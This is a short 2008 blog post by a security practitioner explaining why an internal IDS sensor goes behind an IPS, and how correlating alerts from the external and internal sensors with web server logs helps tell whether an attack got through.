work and IT @ 04 Jun 2008 01:24 pm by ayoi
One of my colleagues from the technical support department asked me on the best emplacement of the internal sensor (IDS) if one network has IPS implemented as well. So I just give him a simple diagram to show him the usual emplacement of internal sensor when we have IPS implemented as well.
The reason why I would place my internal sensor (in this case DMZ sensor) behind IPS because:
a). I always believe that all the preventive measures will be defeated sooner or later. And if the DMZ sensor emplace in front of IPS, then what kind of indication we can have if the attack bypassed the IPS?
b). IF the sensor emplaced in front of the IPS, how do we know that one particular attack has been blocked or not by IPS?
Usually for this kind of emplacement, a good correlation between the alerts coming from the external IDS and internal IDS will help or assist analyst on determining whether the attack bypassed the preventive measures in form of firewalls and IPS. To enhance the identification process, both of the alerts will be compared against the logs retrieved from the targeted server.
As example let say the external sensor produce one alert stating that there is one remote file inclusion attempt on the web server. IF the internal sensor also produce the same alert, it means that this attempt successfully bypass the firewall (of cause) and the IPS as well. Only then the alert will be produced to the analyst console and IF only external sensor produce the alert, then it can be discarded or not presented to the analyst console. It may be used for statistical purpose perhaps.
Also another step will be if the external and internal sensor produce the same alert, then it will be compared against the web log obtained from the targeted web server. And if the response code for that attempt is 200 then these alerts will be produced to the analyst console, else those will be discarded.
BUT then my colleague said
“That’s what I’ve explained to them but their question is Why internal sensor generate too few alerts compared to the external sensor?”
I told him, “That means that their IPS has done a good job la !”
“Yeah, that’s what I thought so and I told them that but they still asking the same question.”
I’m out of words…
